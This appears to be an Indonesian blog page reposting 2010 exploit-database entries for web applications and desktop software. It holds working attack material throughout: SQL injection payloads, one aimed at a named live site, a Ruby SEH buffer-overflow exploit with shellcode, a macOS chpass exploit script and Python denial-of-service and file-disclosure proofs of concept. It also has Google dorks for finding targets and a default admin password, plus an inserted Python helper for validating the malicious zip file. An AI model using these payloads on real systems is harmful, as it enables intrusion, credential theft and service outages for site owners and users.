♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Showing posts with label WLB Database. Show all posts

runt-communications Design SQL Injection Vulnerability

Text : 

=========================================================
runt-communications Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: runt-communications Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://runtcommunications.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:Design by: runt communications

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Live Demo:
http://www.naturetrust.bc.ca/spotlight.php?id=-999+union+all+select+version(),2,3,4,5--


##########################################


References :

http://www.Ashiyane.org/forums/
 

Cacti 0.8.7e and below multiple cross site scripting

Text : 

Cacti Multiple Parameter Cross Site Scripting Vulnerabilities


I. BACKGROUND
---------------------

"Cacti is a complete network graphing solution designed to harness the power
of RRDTool's data storage and graphing functionality. Cacti provides a fast
poller, advanced graph templating, multiple data acquisition methods, and
user management features out of the box." from cacti.net


II. VULNERABILITIES
---------------------

VUPEN Web Vulnerability Research Team discovered three vulnerabilities in
PHP-Calendar.

These issues are caused by input validation errors when processing the
"hostname", "host_id" and "description" parameters, which could be exploited
by attackers to cause arbitrary scripting code to be executed by the user's
browser in the security context of an affected Web site.


III. AFFECTED PRODUCTS
---------------------------

Cacti version 0.8.7e and prior


IV. SOLUTION
----------------

Upgrade to Cacti version 0.8.7f


V. CREDIT
--------------

These vulnerabilities were discovered by Mohammed Boumediane (VUPEN Security)
with help of the VUPEN Web Application Security Scanning (WASS) technology.


VI. VUPEN Web Application Security Scanner (WASS)
----------------------------------------------------

VUPEN Web Application Security Scanner (WASS) is a SaaS security scanning
technology which enables corporations and organizations to identify, track
and remediate security vulnerabilities affecting their web sites and
web applications, prevent criminals from gaining unauthorized access to
sensitive data, and comply with security requirements such as PCI.

VUPEN WASS is based on a proprietary technology developed by VUPEN security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10 including SQL injection and cross-site scripting,
but also real-world vulnerabilities such as shell command injection and
file inclusion.

Read More: http://www.vupen.com/english/wass/


VII. REFERENCES
----------------------

http://www.vupen.com/english/advisories/2010/1203
http://www.cacti.net/release_notes_0_8_7f.php


VIII. DISCLOSURE TIMELINE
-----------------------------

2010-05-05 - Vendor notified
2010-05-05 - Vendor response
2010-05-09 - status update received
2010-05-21 - Coordinated public Disclosure
 

SyncBack Freeware 3.2.20.0 local buffer overflow

Text : 

#!/usr/bin/ruby
# -*- coding: binary -*-
# Software : SyncBack Freeware V3.2.20.0
# Author : Lincoln
# Date : May 19, 2010
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-041
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
banner =
  "|------------------------------------------------------------------|\n" +
  "|                         __               __                      |\n" +
  "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n" +
  "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n" +
  "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n" +
  "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n" +
  "|                                                                  |\n" +
  "|                                       http://www.corelan.be:8800 |\n" +
  "|                                                                  |\n" +
  "|-------------------------------------------------[ EIP Hunters ]--|\n\n"

print banner
puts "[+] Exploit for SyncBack Freeware V3.2.20.0"

#Zip Headers (an .sps profile is a zip archive; the overlong entry name is the trigger)
# Local file header, 30 bytes. The filename length field lives at offset 26
# and must read 0x0bb8 = 3000, the length of the name written right after it.
header1=
"\x50\x4B\x03\x04\x14\x00\x00\x00" +
"\x00\x00\xB7\xAC\xCE\x34\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\xb8\x0b\x00\x00"

# Central directory entry, 46 bytes; filename length (offset 28) again 0x0bb8.
header2=
"\x50\x4B\x01\x02\x14\x00\x14\x00" +
"\x00\x00\x00\x00\xB7\xAC\xCE\x34" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\xb8\x0b\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x24\x00" +
"\x00\x00\x00\x00\x00\x00"

# End of central directory, 22 bytes: central dir size 0x0be6 (46 + 3000)
# and central dir offset 0x0bd6 (30 + 3000).
header3=
"\x50\x4B\x05\x06\x00\x00\x00\x00" +
"\x01\x00\x01\x00\xe6\x0b\x00\x00" +
"\xd6\x0b\x00\x00\x00\x00"

#sub cx,b38 / call ecx
align =
"\x66\x81\xe9\x38\x0b\xff\xd1"

#msgbox: "Exploited by Corelan Security Team"
shellcode =
"\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" +
"\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" +
"\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" +
"\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" +
"\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" +
"\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" +
"\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" +
"\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" +
"\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" +
"\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" +
"\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" +
"\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" +
"\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" +
"\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" +
"\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" +
"\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" +
"\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" +
"\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" +
"\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" +
"\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" +
"\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" +
"\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" +
"\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" +
"\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" +
"\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" +
"\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" +
"\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" +
"\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" +
"\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" +
"\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" +
"\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" +
"\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" +
"\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" +
"\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" +
"\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" +
"\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x4f\x50" +
"\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" +
"\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" +
"\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" +
"\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" +
"\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" +
"\x4f\x51\x45\x44\x48\x45\x5a\x41\x41"

size = 2996
junk = "\x90" * (276 - align.length)   # nop sled up to the SEH record

nseh = "\x5c\x61\x98\xa0" #pop esp / pop ad / jmp ecx
seh = "\x4a\x6b\x40\x00" #universal p/p retn 8

payload = junk + align + nseh + seh + shellcode
rest = "D" * (size - payload.length)
final = payload + rest + ".txt"   # 3000 bytes, the entry name length declared in the headers

filename = "Sync.sps"
f = File.new(filename, 'wb')
f.write header1 + final + header2 + final + header3
f.close

puts "[+] file size : #{final.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Import SyncBack profile and boom!\n\n"
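The profile file the script writes is a zip archive with one entry whose name is 3000 bytes long, and the three hand-packed headers only hang together if their length and offset fields agree: the filename length at offset 26 of the local header, a central directory size of 0xbe6 (46 + 3000) and a central directory offset of 0xbd6 (30 + 3000) in the end record. The following is an added example, not part of the Corelan script, that builds the same layout with `struct` and parses it back so those numbers can be checked before a payload is ever loaded into the target; the filler byte and the function names are assumptions for the demonstration.

```python
import io
import struct
import zipfile

# PKZIP fixed-size header layouts (little-endian), written piecewise so the
# field count is easy to verify: local header 30 bytes, central directory
# entry 46 bytes, end-of-central-directory record 22 bytes.
LOCAL_HDR_FMT = "<4s" + "HHHHH" + "III" + "HH"
CENTRAL_HDR_FMT = "<4s" + "HHHHHH" + "III" + "HHHHH" + "II"
EOCD_FMT = "<4s" + "HHHH" + "II" + "H"
assert struct.calcsize(LOCAL_HDR_FMT) == 30
assert struct.calcsize(CENTRAL_HDR_FMT) == 46
assert struct.calcsize(EOCD_FMT) == 22

DOS_TIME, DOS_DATE = 0xACB7, 0x34CE   # same timestamp bytes the exploit headers carry


def build_overlong_name_zip(name_len=3000, fill=b"A"):
    """Single-entry, zero-length STORED member whose *name* is name_len bytes.
    `fill` is a constructed placeholder; the real exploit puts its
    nops / SEH record / shellcode in this position."""
    name = fill * name_len
    local = struct.pack(LOCAL_HDR_FMT, b"PK\x03\x04",
                        20, 0, 0, DOS_TIME, DOS_DATE,   # version, flags, method, time, date
                        0, 0, 0,                        # crc32, compressed, uncompressed
                        name_len, 0)                    # filename length, extra length
    central = struct.pack(CENTRAL_HDR_FMT, b"PK\x01\x02",
                          20, 20, 0, 0, DOS_TIME, DOS_DATE,
                          0, 0, 0,
                          name_len, 0, 0, 0, 1,          # name, extra, comment, disk, int attr
                          0x24, 0)                       # ext attr, local header offset
    cd_offset = struct.calcsize(LOCAL_HDR_FMT) + name_len
    cd_size = struct.calcsize(CENTRAL_HDR_FMT) + name_len
    eocd = struct.pack(EOCD_FMT, b"PK\x05\x06", 0, 0, 1, 1, cd_size, cd_offset, 0)
    return local + name + central + name + eocd


def parse_zip_layout(blob):
    """Read the three headers back and return the fields that must agree."""
    local = struct.unpack_from(LOCAL_HDR_FMT, blob, 0)
    if local[0] != b"PK\x03\x04":
        raise ValueError("bad local header signature")
    eocd = struct.unpack_from(EOCD_FMT, blob, len(blob) - 22)
    if eocd[0] != b"PK\x05\x06":
        raise ValueError("bad end-of-central-directory signature")
    cd_size, cd_offset = eocd[5], eocd[6]
    central = struct.unpack_from(CENTRAL_HDR_FMT, blob, cd_offset)
    if central[0] != b"PK\x01\x02":
        raise ValueError("central directory is not where the end record says")
    return {
        "local_name_len": local[9],
        "central_name_len": central[10],
        "local_header_end": 30 + local[9] + local[10],
        "cd_offset": cd_offset,
        "cd_size": cd_size,
    }


def layout_consistent(blob):
    """True when lengths and offsets line up the way a zip reader expects."""
    lay = parse_zip_layout(blob)
    return (lay["local_name_len"] == lay["central_name_len"]
            and lay["local_header_end"] == lay["cd_offset"]
            and lay["cd_size"] == 46 + lay["central_name_len"])


def name_len_seen_by_stdlib(blob):
    """Cross-check with the standard library's own zip parser."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return len(zf.namelist()[0])


if __name__ == "__main__":
    blob = build_overlong_name_zip()
    print(parse_zip_layout(blob))
    print("consistent:", layout_consistent(blob))
    print("name length seen by zipfile:", name_len_seen_by_stdlib(blob))
```

Run it on any hand-assembled archive before loading it into the target: if `layout_consistent` is false the reader will most likely reject the file (or read the wrong bytes as the name) and the overflow never happens, which is a far cheaper failure to diagnose here than in a debugger.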
 

CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) Active-X buffer overflow

Text : 


|------------------------------------------------------------------|
|                                       http://www.corelan.be:8800 |
|                                            security@corelan.be   |
|-------------------------------------------------[ EIP Hunters ]--|

# Software : CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX
# Author : Lincoln
# Date : May 19, 2010
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-042
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Communicrypt is running a vulnerable version of ANSMTP.dll/AOSMTP.dll
# See advisory for more details
#




References : http://securityreason.com/wlb_show/WLB-2010050120
 

Google Chrome 4.1.249.1059 cross origin bypass vulnerability in Google URL

Text : 

# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link:
http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or other escape characters inside a javascript:
# protocol string. }
#
# Some PoC :

 

Lokomedia CMS 2.0 cross site scripting

Text : 


# [x] Author: Andrea Bocchetti
# [x] Homepage : www.geekit.it

// Software Info
# [x] Vendor : http://bukulokomedia.com/home
# [x] CMS : Lokomedia CMS
# [x] Version: [2.0]

[#]-----------------------------------------------------------------------------------------[#]
#
# [x] Bug :

Exploit:

# just enter the form to exploit the XSS
#


References : http://securityreason.com/wlb_show/WLB-2010050118
 

yupana-0.1rc1 RFI/LFI vulnerability

 Text : 

------------------------------------------------------------------------
yupana-0.1rc1 RFI/LFI vulnerability
------------------------------------------------------------------------

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com
########################################
I'm eidelweiss member from Inj3ct0r Team
########################################
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Url: http://yupana.berlios.de/
Author: eidelweiss (eidleweiss[at]cyberservices.com)
Greets: all hackers
Require: you need to be logged in to run this exploit

====

-=[ vuln code ]=-

[-] index.php

require_once('includes/lib.php');

/*
* Main routing views
*
*/

$q = optional_param('q');

if (empty($q) || $q == '/') {
// default index
do_header();
include($CFG->tpldir . 'main_index.tmpl.php');
}

====

-=[ P0C ]=-

http://127.0.0.1/index.php?q= [LFI]
http://127.0.0.1/index.php?tpldir= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=================================
 

Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln

 Text : 

#!/bin/sh
# Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
# =====================================================================
# A user can create a file with rw perms in /etc as owner and populate
# it with arbitrary data. This could be utilized to fill the disk or
# write configuration file information that could be combined with
# another flaw to elevate local privileges. This shell script takes
# an argument which is the filename to create (appended with .XXXXXX)
# or I.HAX by default.
#
# e.g
#
# fantastics-macbook:~ fantastic$ id
# uid=501(fantastic) gid=20(staff) groups=20(staff)
# fantastics-macbook:~ fantastic$ ls -l /etc
# lrwxr-xr-x@ 1 root wheel 11 10 Feb 18:42 /etc -> private/etc
# fantastics-macbook:~ fantastic$ ./prdelka-vs-APPLE-chpass.sh
# [ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit
# Password for fantastic: fuck.apple
# [ Created evil file /etc/I.HAX.9GrrKm
# [ Killing my parent PID 1472
# ./prdelka-vs-APPLE-chpass.sh: line 47: 1472 Killed ./exploit I.HAX
# fantastics-macbook:~ fantastic$ ls -al /etc/I.HAX.9GrrKm
# -rw------- 1 fantastic staff 203 17 May 21:15 /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ echo "Turtle power" > /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ cat /etc/I.HAX.9GrrKm
# Turtle power
#
# -- prdelka
cat >> evil.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

/* chpass runs this as the EDITOR, passing the temp file path as argv[1].
 * Killing chpass with SIGKILL before the editor returns leaves that temp
 * file behind, owned by the invoking user. */
int main(int argc, char* argv[]){
    printf("[ Created evil file %s\n", argv[1]);
    pid_t parent = getppid();
    printf("[ Killing my parent PID %d\n", parent);
    usleep(1000);
    kill(parent, 9);
    exit(0);
}
EOF
gcc evil.c -o evil 2>/dev/null
rm -f evil.c
cat >> exploit.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* argv[0] of chpass becomes the program name it uses when naming its
 * temp file in /etc (hence /etc/I.HAX.XXXXXX in the run above), and the
 * EDITOR variable points it at the helper built beside this binary. */
int main(int argc, char* argv[]){
    char* envp[] = {"EDITOR=./evil", NULL};
    char* args[] = {argv[1], NULL};
    printf("[ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit\n");
    execve("/usr/bin/chpass", args, envp);
    return 1;
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -f exploit.c
if [ -n "$1" ]
then
    ./exploit "$1"
else
    ./exploit I.HAX
fi
rm -f evil exploit



References : http://securityreason.com/wlb_show/WLB-2010050116
 

Joomla Component ActiveHelper LiveHelp XSS Vulnerabilities

Text : 


# Exploit Title: Joomla Component ActiveHelper LiveHelp XSS Vulnerabilities
# Date: 18.05.2010
# Author: Valentin
# Category: webapps/0day
# Version: 2.0.3
# Tested on:
# CVE :
# Code :


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component ActiveHelper LiveHelp XSS Vulnerabilities
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = ActiveHelper LiveHelp
Vendor = ActiveHelper
Vendor Website = http://www.activehelper.com/
Affected Version(s) = 2.0.3


[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = XSS
Example URIs
->target-site/administrator/components/com_activehelper_livehelp/server/

---->index.php?DOMAINID=XX&URL=XX&TITLE=XX&SERVER=[XSS]
---->cookies.php?&DOMAINID=[XSS]


[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Vulnerabilities discovered = 18.05.2010
Vendor notified = 18.05.2010
Advisory/Exploit Published = 19.05.2010


[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
<3 packetstormsecurity.org!


[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
 

DBCart (article.php) SQL Injection Vulnerability

Text :

-----------------------------------------------------------------------
DBCart (article.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : May, 19-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : DBCart ONLINE SHOPPING APPLICATION
Vendor : http://www.debliteck.com/
Google Dork : Use Your Brain & Imagination :)
Overview :

DBCart is an online shopping application that allows prospective customers
to browse your products and either save them on their wish list or add them
to their cart and checkout.
----------------------------------------------------------------

Exploit:
~~~~~~~

9999+and+1=2+union+all+select+version(),2--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/article.php?id=[SQLi]
http://127.0.0.1/[path]/article.php?id=9999+and+1=2+union+all+select+version(),2--
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [ met ultah yach sayang :) ]
- N.O.C & Technical Support @office "except ahong (fuck you
off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------
 

Fortitude HTTP 1.0.1.6 remote denial of service

 Text : 

#======================================================================#
#
# Vulnerability............Denial-of-Service
# Software.................Fortitude HTTP 1.0.1.6
# Download.................http://www.networkdls.com/Download/HTTPServer32.exe
# Date.....................5/16/10
#
#======================================================================#
#
# Site.....................http://cross-site-scripting.blogspot.com/
# Email....................john.leitch5@gmail.com
#
#======================================================================#
#
# ##Description##
#
# Fortitude HTTP 1.0.1.6 crashes upon receiving an HTTP request containing a
# relative resource path with an excessive number of slashes.
#
# ##Exploit##
#
# GET / * 8192 HTTP 1.1
# Host: localhost
#
# ##Proof of Concept##
#
import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# A request line whose path is 8192 consecutive slashes is enough to crash the server.
request = ('GET ' + '/' * 8192 + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')
s.sendall(request.encode('ascii'))
s.close()


References : http://securityreason.com/wlb_show/WLB-2010050113
 

DataTrack System 3.5 persistent cross site scripting

 Text : 

# Vulnerability............Persistent Cross-Site Scripting
#                          Directory Disclosure
#                          Configuration Disclosure
#                          Source Disclosure
# Software.................DataTrack System 3.5
# Download.................http://www.magnoware.com/Downloads.aspx
# Date.....................5/17/10
#
#======================================================================#
#
# Site.....................http://cross-site-scripting.blogspot.com/
# Email....................john.leitch5@gmail.com
#
#======================================================================#
#
# ##Description##
#
# User submitted data is not HTML entity encoded before it is rendered.
#
# ##Exploit##
#
# Login using the web client and submit a request with summary set to . Navigate
# to My History to see the result.
#
#======================================================================#
#
# ##Description##
#
# The contents of the root directory can be listed by using a specially
# crafted URL.
#
# ##Exploit##
#
# %u0085
# %u00A0
#
# ##Proof of Concept##
#
# http://localhost/%u0085/
# http://localhost/%u00A0/
#
#======================================================================#
#
# ##Description##
#
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a
# backslash to the filename.
#
# ##Exploit##
#
# GET /web.config\ HTTP/1.1
# Host: localhost
#
# ##Proof of Concept##
#
import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# The backslash appended to the filename is what defeats the forbidden-extension check.
request = ('GET /web.config\\ HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')
s.sendall(request.encode('ascii'))

while True:
    response = s.recv(8192)
    if not response:
        break
    print(response.decode('latin-1'), end='')
s.close()


References : http://securityreason.com/wlb_show/WLB-2010050112
 

PHPVidz 0.9.5 remote database disclosure vulnerability

Text : 

Original Advisory: http://blog.sitewat.ch/2010/05/phpvidz-administrative-password.html

Affecting: phpvidz 0.9.5
Vulnerability: Administrative Password Disclosure
Vendor's Homepage: http://sourceforge.net/projects/phpvidz/
Date: May 15th 2010
Researcher: Michael Brooks


phpvidz does not use a SQL database. Instead it uses a system of flat
files to maintain application state. The administrative password is stored
within the following file and is included during runtime. Because this
file has a .inc extension it is viewable by the attacker.

To exploit this issue visit this url:
http://localhost/phpvidz_0.9.5/includes/init.inc
By default the password is the following constant:
define ('ADMINPASSWORD' , '0000' );
This password can be used to login here (A username is not required):
http://localhost/phpvidz_0.9.5/admin.php


References : http://securityreason.com/wlb_show/WLB-2010050111
 

TS Special Editions 7.0 and below multiple disclosure

Text : 


##############################################################################################
#
# TS Special Edition <= v.7.0 Multiple Vulnerabilities
# Dork: "Powered by TS Special Edition"
# Site: http://templateshares.net
# Download: http://templateshares.net/special/purchase
# Reported on 02/05/2010
#
# Author: IHTeam
#
##############################################################################################
#
# See any seed/leech files of any users
#
# 1) Open any userdetail you want (Ex: /userdetails.php?id=1)
# 2) Paste in url bar this code for:
# 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent
# 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed Torrent
# 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech Torrents
# 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents
# 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently Downloaded
#
##############################################################################################
#
# Bypass Vote System
#
# 1) Open any torrent file detail (Ex: /details.php?id=1)
# 2) Edit HTML Source code with FireBug or Opera
# 3) Search 'form id="quickrate"' and edit this information:
# 3.1) value="CHANGE_YOUR_ID_HERE" name="userid">
# 3.2) javascript:TSQuickRate('torrent_1', 'CHANGE_YOUR_ID_HERE');
# 4) Apply changes and vote the torrent every time you want
#
##############################################################################################
#
# MySQL Credential
#
# You can see MySQL Credential by opening /config/DATABASE
#
# Ex: www.mysite.com/config/DATABASE
#
# a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL";s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";}
#
# It can be fixed adding .htaccess in /config/ directory
##############################################################################################
#
# Other configuration files
#
# 1) /config/WAITSLOT
# 2) /config/TWEAK
# 3) /config/THEME
# 4) /config/STAFFTEAM
# 5) /config/SMTP
# 6) /config/SEO
# 7) /config/SECURITY
# 8) /config/REDIRECT
# 9) /config/PJIRC
# 10) /config/PAYPAL
# 11) /config/MAIN
# 12) /config/KPS
# 13) /config/FORUMCP
# 14) /config/EXTRA
# 15) /config/DATETIME
# 16) /config/CLEANUP
# 17) /pjirc/pjirc.cfg
#
##############################################################################################




References : http://securityreason.com/wlb_show/WLB-2010050110
 

WebJaxe 1.01 remote SQL injection

Text : 


###############################################################################
#
# Exploit Title: WebJaxe Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###############################################################################

!You need a registered user!

http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]

Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs
 

Caucho Resin web server 3.1.2 Admin Login XSS Vulnerability

Text : 


# Exploit Title: Caucho Resin web server 3.1.2 Admin Login digest_username&digest_realm XSS Vulnerability
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no



P0C:(no need of login)



POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
